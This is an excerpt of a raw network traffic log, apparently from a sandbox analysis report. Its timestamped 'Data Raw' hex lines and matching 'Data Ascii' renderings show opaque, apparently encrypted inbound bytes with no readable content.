                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11847INData Raw: 10 3a 55 31 da bb 02 e9 fa 55 27 68 b5 4f 47 03 53 b1 b0 d7 2f aa bd 35 85 d4 23 86 8a 03 d0 9e f8 9e 9a 5d 24 39 39 53 0c d3 be 6d 2a e5 b1 cf 17 10 10 41 ce a6 ce 9c 9a b9 48 4c e4 88 45 56 4d fd 8f e4 20 21 df b0 79 79 2f b7 e0 c0 15 0d c3 63 13 a6 1f 95 d2 65 75 4a bb ef 45 f7 86 d0 45 34 f1 e5 70 df 1b 5a 69 71 63 42 d2 9d 4d 7a 53 8b c5 94 18 48 9f 48 04 a7 e5 81 c5 dc 81 73 7b 7e a7 3e 99 00 26 b3 45 ef ef fe 51 7b 8c d4 61 06 39 48 17 63 2a cd 52 9f 0f 56 73 8e 05 30 09 a2 35 f3 16 24 c7 85 96 db a8 c5 02 88 b9 95 71 65 bb 84 a4 7b 44 af 78 5b c8 dd ca 35 72 5e 5d 0d 00 89 cd 83 51 f8 5f 1d 84 8c c1 0f 1a 03 18 ba 40 bb 4a 8d 2e 3d c9 7f 3f 94 ee 85 63 a2 70 86 84 90 fb 76 33 00 a9 04 76 9c 87 65 2f c4 74 56 0a 86 e3 a3 3f df 11 aa c6 00 26 2a a7
                                                                                                                                                                                                                                    Data Ascii: :U1U'hOGS/5#]$99Sm*AHLEVM !yy/ceuJEE4pZiqcBMzSHHs{~>&EQ{a9Hc*RVs05$qe{Dx[5r^]Q_@J.=?cpv3ve/tV?&*
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11863INData Raw: 9f a9 b1 1c 82 20 ef 0c ce b3 5a 10 76 04 67 ba e4 a9 d7 eb 77 ce b7 8b a1 e3 af d9 69 4f 4b 08 fa 5e bd ab 24 a1 6d 86 26 e3 c8 f8 bc 42 9b 9a a7 69 d8 d2 b6 8d 66 8f 96 ca 9b 33 af 41 41 f6 aa b6 f6 3d fb 90 85 09 87 27 11 08 49 9e 74 a6 27 9a 3a e5 7d c6 90 8d 2e 41 c1 39 dd 9a 2d 19 1f 88 a6 9b 18 fc e7 fc 2b e2 e0 52 19 33 68 3d 57 38 26 61 ae 73 5e be cc 36 1a 4c c4 08 6c d5 cb 4d 88 86 ae cd 13 36 51 08 73 cb ac 63 17 fc d6 1b f1 19 bb 8e f6 92 22 02 6d ce 0b 87 35 e9 5b f3 9d bf 66 a5 5a 67 41 96 5a 0e 5d 33 18 a0 94 f2 86 44 7b d2 ae 6f ce 20 8e f8 bf a9 2c 2b b8 a6 39 d6 7e a9 1d 0b 57 6e 26 fe 7b 22 33 bb 94 76 4f 20 c9 ed 52 5a ac 14 d1 71 a1 29 1d af 3a e0 de 0a c0 5b 6e e9 7a 5d a4 cf 9b 20 e7 9f a6 6e 0b 64 d2 99 80 82 88 d8 bd d5 6d 12 0e
                                                                                                                                                                                                                                    Data Ascii: ZvgwiOK^$m&Bif3AA='It':}.A9-+R3h=W8&as^6LlM6Qsc"m5[fZgAZ]3D{o ,+9~Wn&{"3vO RZq):[nz] ndm
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11879INData Raw: 63 33 31 51 39 b1 65 f6 c3 fe 12 a0 f0 3e 11 fb 96 fb 2f 21 17 32 9c c6 b3 2d 33 fa 84 10 f2 6e 5d 26 9f c6 ca a0 55 1c 79 32 e0 28 41 78 92 3b 8e 51 ad 1b 7d 54 c8 89 60 ea a1 ea 13 b6 10 c0 53 a9 67 73 2a e1 ba 83 02 66 e8 7a 64 45 cd 1b 76 f3 3d a1 fe 1b 64 a8 56 0d e5 d3 6f 7e e4 ee b9 26 c7 80 15 21 fa d1 c7 45 a6 ec c7 41 d0 40 03 e9 2a 0f b0 91 e6 9c 05 83 ee 36 fc 63 91 91 04 79 d8 e5 36 ac d7 8f 52 6c 76 a9 b4 02 8e b5 6c 26 79 19 9c b9 30 f5 fd f9 f7 ef d7 3d ae ac 10 48 5a 09 65 1d 0d 4c d0 bc 0c 54 b1 86 1d fa 19 d4 78 3d d3 d1 3e b9 a5 4e d0 90 66 b0 f2 0b 58 89 03 ea 48 3c cc 47 f3 90 62 4b 54 e1 d5 94 83 f9 ad 96 d0 c5 e5 62 fc 6c 88 c3 15 33 f4 87 0e 55 2c 0e 67 71 e6 d3 6d 8c 32 80 da af 3a 88 e1 2f ad d4 5c 22 41 e7 90 15 a3 8d 60 cd 01
                                                                                                                                                                                                                                    Data Ascii: c31Q9e>/!2-3n]&Uy2(Ax;Q}T`Sgs*fzdEv=dVo~&!EA@*6cy6Rlvl&y0=HZeLTx=>NfXH<GbKTbl3U,gqm2:/\"A`
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11895INData Raw: 20 b1 b1 ef 08 88 84 58 ec 3c 49 50 1d a1 f1 dd fd 5e d9 0e d4 8c 80 07 fc 05 6d c6 00 9e e6 ba bb eb b0 00 ac 62 f6 8b dc 34 98 15 05 d0 07 ef 6c 0f ef 87 de cd a2 3d fa 8b da 69 94 a4 90 ea e9 74 b2 41 57 ad 82 75 a6 f2 d2 b0 8b 18 42 6b 45 b6 b1 65 7e 59 b8 bf 38 f2 e6 dd fc 58 4a c1 12 b2 cb 53 25 b2 70 94 20 e1 1e 21 60 83 61 e3 57 38 a3 9b 80 48 8d 28 76 28 76 cb da 6f 84 1e b4 6b 7b dd 48 57 89 3a 73 58 b2 52 d6 44 f0 5b a5 62 45 e5 e0 c1 c3 ea 16 38 04 2e e4 55 3e 32 c3 ea d7 ee 70 43 48 3b 00 32 bd 96 12 39 3c 2f 70 51 ca 74 e6 76 e3 5c a1 27 67 0b db 89 e6 5e 56 15 9a b0 2e fa a8 de 9c ac 2d ff 6b 6f c5 a7 ca 9e dd d8 e8 81 e6 34 22 f1 27 c7 40 ab 7b 93 d8 75 a9 21 79 c2 ae 93 76 3f f7 77 c2 a0 97 2e b0 42 be 14 41 da 40 f4 9f 5f 70 3e c6 f7 99
                                                                                                                                                                                                                                    Data Ascii: X<IP^mb4l=itAWuBkEe~Y8XJS%p !`aW8H(v(vok{HW:sXRD[bE8.U>2pCH;29</pQtv\'g^V.-ko4"'@{u!yv?w.BA@_p>
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11911INData Raw: 7c 61 db 04 48 89 61 ea 4f 66 ec 03 72 9e 3c 4a e0 4f 3b e9 32 f7 5a bd 44 db b2 ed 0b 60 04 43 7d 8b 13 7d 99 f7 b8 c2 3d 33 08 0c 65 c4 68 4d 65 5e 3a 5e 7e 7d f0 0b e9 51 a3 5d 61 42 64 ea ef 04 04 d4 56 ec 29 b4 07 2c bb 24 d3 57 c3 f7 4b 51 c2 e2 a4 e5 f6 c4 c4 2e 92 c7 b6 9d 1c c7 54 d0 a8 cd 49 54 45 54 39 f2 ef 07 39 5d 22 ae 07 7f 3d f0 54 9c 59 c5 48 c7 09 5f 0c e0 8b 7f 38 52 56 aa 4e 6d 43 4e 0f 9c 64 e8 34 e2 d8 aa 7a 88 10 ec a2 b1 ef a0 64 71 26 f1 fa 9e d8 76 bd 24 22 fd a1 68 d8 18 f6 77 c4 c8 f1 68 8a c6 79 d4 ff 6f 92 a4 a0 90 2a ec b8 30 b9 ec 2d 61 12 60 f8 41 d2 0a 99 5b c5 61 a9 0c eb 3b c3 8b 9f fa 23 ed 37 fe be ab 1f 9c f0 69 0c 7d 6a 51 33 20 1b 44 b0 1e 03 7a 49 93 ee 73 9e c0 1c e1 bb 2b d7 c3 ab 0d 8e f3 d0 10 8a a2 f0 a9 98
                                                                                                                                                                                                                                    Data Ascii: |aHaOfr<JO;2ZD`C}}=3ehMe^:^~}Q]aBdV),$WKQ.TITET99]"=TYH_8RVNmCNd4zdq&v$"hwhyo*0-a`A[a;#7i}jQ3 DzIs+
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11927INData Raw: a0 c3 bb 67 bd 7a a0 c5 8c 1a 47 70 10 e7 ae 58 da c3 d5 92 fa 9b c4 eb b8 9e dd c4 8f 5a 0c f4 eb da 4d 25 07 ee f5 23 68 05 e7 fc e5 0a 2c 08 fe b9 3f bd 94 65 1e a6 20 e4 72 71 17 00 6d 7a f0 71 80 96 c4 a8 f6 75 25 16 44 9b 85 2c 51 64 9c d9 2f b5 b0 7a 26 11 fa 80 92 15 cc 3b 2e fc 9b 98 65 57 98 9d bb 28 c1 e4 79 9b 6a 6c ae cf 40 d9 5e e4 a4 03 b6 c9 dc d0 d7 4a 46 2e 55 eb 2b fa 4e 00 6b 17 d9 16 fe 0a 92 3a 6b ec 9b 47 23 49 2f e1 f3 4d 0f 07 e6 03 24 07 1e 1a 66 df 36 fd 87 cd 7e 73 53 9e 92 57 ef 30 ad f1 4a 46 e0 c0 93 3c f5 93 2b eb e9 9c b1 77 ce 6d b4 e5 d3 ba e4 19 75 0f 9c fb fd 3c ba f4 99 34 c1 5d 38 4f 8c 0c ae 4a 43 08 c2 7c 7b f3 6d cb 33 87 6e c4 80 b5 5c a6 06 d5 ed a1 cf d2 c9 b5 e9 24 b0 94 2c fc 85 c8 20 32 18 b0 90 5a b9 dd c8
                                                                                                                                                                                                                                    Data Ascii: gzGpXZM%#h,?e rqmzqu%D,Qd/z&;.eW(yjl@^JF.U+Nk:kG#I/M$f6~sSW0JF<+wmu<4]8OJC|{m3n\$, 2Z
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11943INData Raw: 92 fe 38 ab 0b f2 35 40 9b a4 98 c9 5c f8 c9 dc 70 71 1f c9 c7 59 d6 91 5c ae 34 13 3f a1 c2 ad bb 6d 64 ab 5b 98 48 a3 1d 4b 3b 7d 4a ba d4 18 9b 21 ea 1f e6 a9 7e 18 19 54 98 59 02 67 a2 6d e4 fa 8d bb 72 53 6f c8 c5 a4 4f 1c 0d ab f7 a3 79 a9 eb 0c 37 c1 22 e0 64 3f cc 23 b1 a1 65 7a 44 99 38 15 8c 91 d8 1a 0d 1c 53 2c 68 a2 7c be e9 46 6e fe 45 05 0a 0d 78 0b 05 65 c0 f9 69 e8 9e c5 a8 73 2c 76 c3 fa 85 00 52 9c 3c e3 6a d9 71 b5 e7 9e 18 5f b7 f8 aa 09 e3 a6 7a 70 60 00 83 42 a7 4b 3e a9 62 73 50 7d dd 53 6e 9a 59 98 39 e0 6b 56 de 87 df 95 bd c0 c8 24 0a 71 ec 04 33 35 12 c3 54 81 68 ec dc ed 82 2e 2a 0d 10 d5 16 e7 2f f4 02 68 bd 36 19 0e 19 eb ed 9e e1 ab 95 4e 59 b8 2c aa 01 2c c2 f8 e5 b3 94 f2 f5 b4 7b 80 01 da a0 91 47 42 82 4a ce ff 9b 98 3a
                                                                                                                                                                                                                                    Data Ascii: 85@\pqY\4?md[HK;}J!~TYgmrSoOy7"d?#ezD8S,h|FnExeis,vR<jq_zp`BK>bsP}SnY9kV$q35Th.*/h6NY,,{GBJ:
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11959INData Raw: b2 e8 47 f0 e5 be ab 2f c9 ff 8d 76 2b c5 1c 94 8c 3b 48 4c 9e de a4 61 3c 53 fe db 42 e6 4f 08 d4 10 b4 49 dc 41 83 96 dd 6c a4 0e 67 17 18 91 4e 46 4e 51 f0 69 f2 9d 7b bb 01 f1 2d b6 1e 5e 1d 2a ed 9c 2b 64 79 20 e0 d4 c2 3c 71 ae d5 30 eb 60 c8 05 45 7e 47 8a 45 67 8a ce df c2 bd a3 07 59 5c 93 79 18 30 8d 24 ae 2b 2f 1e c3 aa af 2d c3 3b ae 06 ca 47 0a d0 6d cc db ed 28 e8 78 5d cf 65 53 7d 45 c4 23 39 0c ae 9f 25 a2 cd fd 82 05 dc 3a 32 1d 9f b8 5b 5d 27 64 ef a7 d7 bd ea b5 f1 ef 11 5d d6 04 bd eb 7c dd ca ba d3 42 ea aa 34 aa 9b af 4b 5c 39 b8 87 81 2d a5 17 06 c9 ca 23 68 d7 de 3e ac 19 63 d3 25 a8 0a 9b de bc a2 9e 2a d8 63 ae e7 f5 aa 25 92 d2 0d ae 23 12 c4 68 63 97 16 db cf 59 e2 50 49 d7 54 00 9c 78 f8 77 a7 c0 f2 d7 08 83 8d 75 35 a7 82 28
                                                                                                                                                                                                                                    Data Ascii: G/v+;HLa<SBOIAlgNFNQi{-^*+dy <q0`E~GEgY\y0$+/-;Gm(x]eS}E#9%:2[]'d]|B4K\9-#h>c%*c%#hcYPITxwu5(
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11975INData Raw: d5 47 25 e1 f7 37 27 0c 35 87 83 5e a4 cb e1 93 10 0b 27 78 3f 5b a1 40 d5 8f 0e 47 2c 0c 07 98 f2 aa 1b fe 86 1e 2e 16 0d bc a5 bb ca ab cf ac 05 c7 af 0b 60 01 16 56 ce bf 7b 4c 37 ef 7a d7 18 3e 9f 1c 10 8b 7f ca 11 98 eb dd f0 20 2e f5 16 67 e7 38 39 bb ac 26 35 2b f0 02 cf 40 d5 63 06 36 c6 ca 09 af 2b 66 d1 59 8c 3b 9e d6 fa 2c 1a a6 92 bb 4e b5 9b 9f c7 f0 3e 06 93 72 c6 9d f5 1e ab b2 b5 26 c9 6d 5b 35 5a ac 5d ce 14 01 48 20 51 c2 b9 4a 88 31 d2 33 1a 55 ff b0 ef 78 be 4f 04 72 e5 82 fb f7 36 86 1e 05 97 ee de db 42 d6 23 7d fe 38 70 09 d6 2f 54 4d ab 81 32 b8 d4 2c 8e 88 85 c7 92 62 87 ff 3e 17 ad 86 7d 28 b0 d8 49 d6 3c 1b 7b f7 b1 14 50 c9 e3 a6 89 6a 8c 12 81 5c b1 d2 5f 35 8c 49 85 c2 4b a7 4b 04 d4 89 56 6e cb 4b 5e 10 8f 51 61 4f 19 3d 3d
                                                                                                                                                                                                                                    Data Ascii: G%7'5^'x?[@G,.`V{L7z> .g89&5+@c6+fY;,N>r&m[5Z]H QJ13UxOr6B#}8p/TM2,b>}(I<{Pj\_5IKKVnK^QaO==
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11991INData Raw: 50 f9 f2 c7 46 da 70 ef 50 32 0d de 1f 0e 09 19 c6 42 64 73 7f 0a b6 67 25 61 4f f1 f7 fc 9a 3b 4e a5 45 2a 86 9e fb db fa 6a 97 11 73 1d ea ec c6 3f 34 48 ef dd 08 5f f6 a7 bf 0d a2 c4 50 c2 33 2c 5d c3 e8 fa 71 33 27 ba c5 00 dc 63 8b 91 aa fa 1b a3 2a 25 82 29 bc c1 68 21 37 b3 94 12 a2 0b 9e 7c 26 42 4b 24 11 d9 a4 31 46 67 f5 4c 8f af ab d1 a8 d6 8f 9f c0 0a 7f f5 b9 f0 c9 a0 27 9d 02 1c 68 da bf 2d bb 22 69 2f 97 a8 9d 79 4a 8c e1 03 66 2e 9e dd 7f e3 ca 61 3a c7 be 1c 8d c0 c9 5c 7f ac f1 fa 12 b0 b2 36 e2 16 75 47 49 f2 57 4d 1e 2f 91 35 a4 bd 94 35 7c 49 0e 62 82 3a e0 39 a4 17 fb a1 d5 90 c2 5b 13 ab cd 1d e3 5e 64 64 d2 2a 7d f1 35 2f a4 f8 34 d5 a4 22 0a 97 8e 26 bf 7c 19 eb 03 54 b4 14 ba 35 b3 e2 d7 31 bd 05 68 f0 ff ab da c9 ad 79 f4 03 e4
                                                                                                                                                                                                                                    Data Ascii: PFpP2Bdsg%aO;NE*js?4H_P3,]q3'c*%)h!7|&BK$1FgL'h-"i/yJf.a:\6uGIWM/55|Ib:9[^dd*}5/4"&|T51hy
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12007INData Raw: f9 95 aa 38 4f 79 e4 d6 17 ca 61 72 c4 a2 3d 82 03 04 b6 e7 aa c2 06 25 c0 2a 3d 44 c0 82 e0 c0 a4 fb a4 12 47 98 44 4a 44 4f 30 28 86 82 c6 56 5d d2 c0 bf 15 d9 66 6a 5c 9a 96 c6 9d 00 3a 2c cf 76 70 ac 27 8a bc ee 3e 60 ee 1a 46 33 35 7b 3b b9 48 e4 80 2b 04 f4 ee f5 ce 06 a5 30 d7 3f 52 d0 02 17 4c fb 7e 8b eb ba cd 77 0d 8f 9a c4 90 48 59 89 c1 e3 ba 96 50 ac 15 1d 4c 34 34 ef 16 e0 51 eb 9f 32 5c 3d 87 04 ce e5 ad 77 15 89 00 73 5e ac 62 ba 8f 6c c5 86 6e b6 b9 bb 74 42 20 c8 a0 82 d8 54 3c 06 88 90 52 e8 a5 fe fb a5 e6 8d d1 0e 44 62 69 03 27 f5 d4 50 bd 94 53 25 16 38 b7 17 d0 86 d2 ab 11 19 86 96 ec c3 94 e0 5b e6 03 8d 7c 3a 53 ba 17 2d 2f 73 11 84 65 e7 56 4f 61 7c 36 73 d1 25 0f 0c fe cd 56 23 8a 67 d7 be c4 c2 7a 58 6b 34 82 86 e7 c0 27 75 2e
                                                                                                                                                                                                                                    Data Ascii: 8Oyar=%*=DGDJDO0(V]fj\:,vp'>`F35{;H+0?RL~wHYPL44Q2\=ws^blntB T<RDbi'PS%8[|:S-/seVOa|6s%V#gzXk4'u.
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12023INData Raw: 75 dd 9f 41 40 5d 06 d9 f1 f5 f5 1a 39 5f ed c4 08 10 61 5f 66 ff 4e 8f 7f b4 e2 9f c4 87 2e 82 5b b7 ed 42 00 92 f5 82 58 92 03 76 35 ae b5 15 17 30 e2 84 75 4f 3b b1 f0 8d 93 a0 51 23 38 62 12 8c cd 6e 1b 55 c6 03 e1 71 08 78 2b 31 1a d3 29 87 a7 c1 7a 90 41 58 88 2a 78 24 a2 d2 fd f4 27 6a 23 ca c3 bb 33 b3 e3 38 eb 1d c8 3b 7a 59 6a 13 45 03 2e a8 e8 d3 7d 61 bf 17 e9 65 65 95 39 9b 0e 01 58 e0 c0 c9 f5 4a 09 93 28 5d 80 70 f7 7c b8 ff a4 02 97 4b 50 a5 ab a5 a9 82 e0 db 27 93 6e 63 d8 05 6a 0c 59 5f 9d 6e d4 6f 33 12 10 ce 7f 08 3d 6e 5a 4b 09 13 37 a8 80 3e 67 ad 36 5a be 56 65 2f 53 36 92 34 5e 8a f4 43 74 dc 4f 29 f4 dc f9 16 4f 20 c1 98 7c ee bc f6 38 12 7e 4e a6 21 99 bf bc 77 e5 7a bc 8c b5 44 5c b9 4c 79 6c 01 d9 6a 2c 29 18 29 f3 68 c8 34 5e
                                                                                                                                                                                                                                    Data Ascii: uA@]9_a_fN.[BXv50uO;Q#8bnUqx+1)zAX*x$'j#38;zYjE.}aee9XJ(]p|KP'ncjY_no3=nZK7>g6ZVe/S64^CtO)O |8~N!wzD\Lylj,))h4^
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12039INData Raw: d0 3b b4 ca 09 19 31 76 56 fa 92 d0 8b 74 f5 1d 50 07 00 33 ff 78 2b e1 fd 93 09 a5 c5 bb 18 3a a2 86 22 cf df cf e9 84 72 67 2c fe a7 24 30 25 21 f5 fc 71 4b ff e2 55 31 43 3d 93 e3 2d 87 a1 b1 ed e3 8c 61 d1 dc 0c fa a5 93 68 82 ea 9a 81 db e6 d2 03 4e cf b2 5b 8e 99 71 5e ea 09 69 57 69 b8 86 7b 71 0b 4b 73 00 15 e6 bf bc 4a b2 7e 0c 94 41 34 0e bd 7b 08 3b 27 b0 49 d4 cf a1 b2 68 3d 0d 34 51 e9 56 49 48 20 e7 9e 95 23 8f 79 24 ff 12 7d 75 85 a0 67 3c e3 f4 48 0d 80 69 a5 50 e8 61 00 0e 30 f5 83 50 7e dc 1f 4a 0f 25 56 ec a8 70 65 de 10 a0 20 21 cf d7 ac c1 64 6a 3b e1 33 ec 0e 97 29 b9 23 1c da 59 4b 97 58 53 32 cc 27 3a 61 9b ed b4 f6 47 5d 52 3b 81 c2 86 7e 9e 93 b3 ee 23 06 0c 60 28 47 71 4f fa 2d a3 e3 08 9f bb 46 0c fd 0f 9b 11 fd 46 01 64 0b 05
                                                                                                                                                                                                                                    Data Ascii: ;1vVtP3x+:"rg,$0%!qKU1C=-ahN[q^iWi{qKsJ~A4{;'Ih=4QVIH #y$}ug<HiPa0P~J%Vpe !dj;3)#YKXS2':aG]R;~#`(GqO-FFd
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12055INData Raw: 69 15 db 20 77 9c 3b 9b 8f 25 23 92 6f a1 a2 2a bd 99 2a 4b 50 7f c0 bb 5e f8 b2 02 45 f2 a1 4c 73 64 22 2a 5c 83 a0 e4 fa 65 ed b1 d4 57 98 31 09 6f 8d be 7f f2 b1 6f 68 9e 50 29 2a d3 85 6c b7 6c 40 5e df 41 a8 50 34 83 02 88 49 54 ea ab dc 62 3e f0 fe 0e 3d bf e3 5b fc 77 36 58 d1 ee a9 d8 dc 15 3e 4a a3 ab 68 58 e7 18 e0 6e 57 8a b7 ab 63 0f a8 3f f9 42 ed 64 f9 f0 2b 8c 96 b1 9b 0c 8d 56 7a 83 8f de 1c 53 6c 6f 01 c7 35 8f 24 12 af 2d 2f 09 3b 8f cd 5f 64 4c 7b 8a 6f ef 9f 1f 12 26 3b 43 6a df 00 41 03 96 4c 1e fc 39 39 1b d3 71 be 16 a7 09 c5 88 ae b0 42 53 15 dd 8c 2e e7 0a ba 11 c6 d0 2d c7 7b 3b 3c 70 44 06 cc 38 8f d7 34 e7 d1 60 eb f8 92 67 e7 f2 d4 5b fd e6 06 58 9b e0 33 50 1b 2c dd 51 38 50 6d dd 9b 20 d6 f6 7f de 5e 5f 10 20 23 69 f1 0c 2f
                                                                                                                                                                                                                                    Data Ascii: i w;%#o**KP^ELsd"*\eW1oohP)*ll@^AP4ITb>=[w6X>JhXnWc?Bd+VzSlo5$-/;_dL{o&;CjAL99qBS.-{;<pD84`g[X3P,Q8Pm ^_ #i/
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12071INData Raw: b5 7f 86 62 9b a5 96 fc e7 5a f2 cd aa 52 61 48 e7 2a 6e 89 69 b0 9a 56 5c 24 00 cd 36 9f e2 ce 7d 80 f9 b6 02 f3 68 46 a8 3c d6 78 50 b1 7c 58 62 9b 16 de 05 ff 19 89 b9 9c b2 00 bd 6b eb f5 dc 18 85 44 90 42 ed 1d 0f 0b 4b 09 7c 7f 7d 24 91 45 7c 78 02 f8 85 62 c0 15 47 78 1f ef 14 31 b4 14 65 ec aa ab fe 05 cd 5d 50 94 69 99 42 d6 78 21 98 92 4f 7d fd cd 0a 16 d8 aa 74 72 54 5d 8d 1e 1e 25 a1 d0 fa 50 07 ba a6 bb e5 57 30 61 03 01 d4 53 9a 1f 41 4b 23 dd 2d d8 5a 52 24 74 be ec 6a 24 f8 63 14 89 07 4a f9 6d 8a 0c 1d 33 d2 5b 04 ba f8 87 ea 74 e2 52 98 53 39 c0 0c f8 74 0e f9 e8 07 28 91 f1 04 4b 41 99 2e e1 60 bd 52 fb 44 ee 69 4a 25 11 30 24 e3 7f 1f e0 8d 30 68 69 58 65 81 91 1d 95 5d 14 d1 28 52 96 6b 47 40 07 d9 95 f9 63 68 69 58 8b 59 ee 6b 8b 60
                                                                                                                                                                                                                                    Data Ascii: bZRaH*niV\$6}hF<xP|XbkDBK|}$E|xbGx1e]PiBx!O}trT]%PW0aSAK#-ZR$tj$cJm3[tRS9t(KA.`RDiJ%0$0hiXe](RkG@chiXYk`
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12087INData Raw: 9f b2 5a 3a 72 74 19 1b 7e 0c 7b 53 67 45 bf 64 4c 31 9e 84 d7 9b 80 cb e3 6d d1 b3 a8 0c bb 10 c1 e5 12 14 59 e5 8b aa 0c 0d e2 97 db 1d ea 40 b8 25 a3 40 e6 79 b7 5e 92 c4 36 01 d2 6b 52 c1 9a 9f 9a 54 b6 88 3c ea 96 06 fe e3 db f3 7c 5e 3b 86 ac 3b 23 9e 32 08 7d 77 e6 11 17 f7 59 d4 c2 89 26 5e 1d 71 5b 63 3a 9a e7 97 ca 44 7d 12 fb 91 9d 00 26 af 6d 69 9e 10 86 04 e5 01 06 0c ed 4e b2 34 25 81 db 15 2b a8 32 40 1a a5 44 2e 49 70 22 79 53 91 46 a6 76 dc 08 2c b1 56 f4 a3 fd 3d ca 7f 22 ec 2e d3 3e 4e 62 7b b6 73 9c 3b 5a 4e 3f 7a 06 22 1c d3 82 e6 9b fb d6 4d c4 03 1b 80 86 46 92 af e5 5f 27 03 75 4d 11 7f bd 98 3a cd b5 9b d9 57 78 cd 6a 8f f0 fe 83 ff 5c 84 5a dd 12 8d a3 12 c5 41 90 b5 e0 1f 51 02 da 48 dc fd 6f ce bd 8a 44 b7 66 8d 44 4b 4d 9e b8
                                                                                                                                                                                                                                    Data Ascii: Z:rt~{SgEdL1mY@%@y^6kRT<|^;;#2}wY&^q[c:D}&miN4%+2@D.Ip"ySFv,V=".>Nb{s;ZN?z"MF_'uM:Wxj\ZAQHoDfDKM
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12103INData Raw: ac 8c 0d 2d 2e c9 76 1c 9e aa e7 3d 9c 67 73 eb 41 1b ec e2 f2 a8 43 12 0e fc 2c 6e 64 ed 2d fb 0c 2d 4a f8 c7 e4 f1 62 73 35 fa 26 40 62 cd db d4 6c b4 b5 2e 09 4e 13 ed ab f9 96 d3 47 e7 8a 64 f3 b0 36 d0 f5 1c c6 79 a4 e5 bf 86 c0 f6 80 18 4c f7 b5 7e b3 c0 65 97 d6 fa 90 c9 3b 45 5c 47 22 30 de fc 85 98 33 b1 4d 50 eb f8 3b 14 9a fa b0 92 27 fc e6 3e 99 5f 37 b6 ca f3 a1 87 2a f3 5b c8 83 e6 ab 0b 13 2e 12 fa 10 b8 c5 2c b7 75 c1 c5 84 00 28 a7 83 e3 9d 0f 7f c8 05 06 3d 37 e1 8b 07 0a dd 80 4a 92 fe 17 45 ad 48 71 23 46 ba c6 82 e5 7c 40 02 ec a9 1e d5 77 91 28 d0 91 2d 1e 39 22 18 56 93 2a 1a ee d6 56 f0 db 16 30 f0 3d 4d 89 fc 64 f3 7a 65 3e 45 6e 52 9e 40 72 79 23 84 43 92 13 0b 6a 66 a7 d6 d3 a9 1d be 0c 87 da fe 51 ed d5 70 cc a3 e2 8a 66 1c c8
                                                                                                                                                                                                                                    Data Ascii: -.v=gsAC,nd--Jbs5&@bl.NGd6yL~e;E\G"03MP;'>_7*[.,u(=7JEHq#F|@w(-9"V*V0=Mdze>EnR@ry#CjfQpf
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12119INData Raw: cd 72 62 a9 2c ef b1 a4 d3 b7 67 93 1c 72 61 75 de 21 c3 cd 65 ff b9 e3 2b d2 1e 81 4c 34 b4 a0 73 ae a1 37 6f dc a9 93 13 8a 70 55 bc 9b 40 76 5d a4 45 04 61 ea e4 76 74 f4 59 24 e9 4c 9f 81 57 94 14 4d 92 5f ac ca a9 8f a2 b1 54 bd 48 33 b8 85 b0 5c e9 0a 7b 05 d2 f6 48 07 aa 5b 39 06 d8 4c ce 3c 87 6a eb e5 86 49 3e 32 23 de 4f c4 5d 5e c4 9d 08 3d 04 43 16 c6 a3 f9 dc 76 5f be a3 06 1a bf 0c ef 08 eb 66 70 55 ae e9 cd 86 89 d6 70 7b c0 f9 ff bc de 92 a4 a9 63 3f b0 07 48 4b 36 c2 bf de 42 7e bd 43 d5 cd b5 8e 18 86 4f a1 e2 28 22 eb 94 f0 82 e4 f9 45 dd 10 c1 c2 0e ed 8c 9c dc 06 ff 8e 84 f3 90 8b 5b 63 e1 bb ef 36 93 6c 13 e7 b5 bc 6a 89 69 27 89 02 77 5d 15 98 54 06 e0 8c f8 ca 86 95 86 ac 68 0b bd c2 f4 9e aa 6a dc 24 93 04 36 39 fe 74 87 19 20 b3
                                                                                                                                                                                                                                    Data Ascii: rb,grau!e+L4s7opU@v]EavtY$LWM_TH3\{H[9L<jI>2#O]^=Cv_fpUp{c?HK6B~CO("E[c6lji'w]Thj$69t
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12135INData Raw: 0d 73 f3 23 27 41 f9 e2 50 f6 f5 f0 93 e6 3e 55 90 db d6 d0 14 8a 45 a9 26 60 bc 17 01 67 0f 8f a8 42 67 c4 03 bf ff b2 0e ae 2b 5c 84 8d a8 28 38 b5 d8 c4 0d ad 8f 59 07 8d 51 91 87 77 75 00 6a 3f b9 49 be 2d ea d3 71 67 1f 2f a6 31 a8 7a b8 7d 35 31 1a 3e 42 44 34 98 50 d7 98 ec 29 29 16 a7 b8 33 42 69 06 68 7e a5 6b 4e 81 67 e8 75 81 cd d3 65 3a 31 16 99 99 c3 56 45 c9 b9 3e 59 6f 8f 10 37 c0 dc 7e 2d 73 9a 6f de 07 7c 63 7d aa b2 88 d1 51 3f 8a 59 c1 b7 c6 9c 42 09 22 5a 2c b5 ce 43 7e c3 e1 25 f6 1d df d4 a2 1b 00 b0 78 75 73 44 9a f8 f3 0f 15 de 68 90 6e 98 b5 14 92 21 4e 75 92 5f 1c ae c5 89 27 d5 12 07 f1 95 73 63 4a 1f c7 44 12 21 7a d2 a0 08 ab c5 db d2 3c f4 2a 0e 1a 3d dc 1d b7 3b 6f 9c 8b c8 27 9c 37 b8 4d 23 c4 b7 b8 53 ca ec 86 b6 32 16 69
                                                                                                                                                                                                                                    Data Ascii: s#'AP>UE&`gBg+\(8YQwuj?I-qg/1z}51>BD4P))3Bih~kNgue:1VE>Yo7~-so|c}Q?YB"Z,C~%xusDhn!Nu_'scJD!z<*=;o'7M#S2i
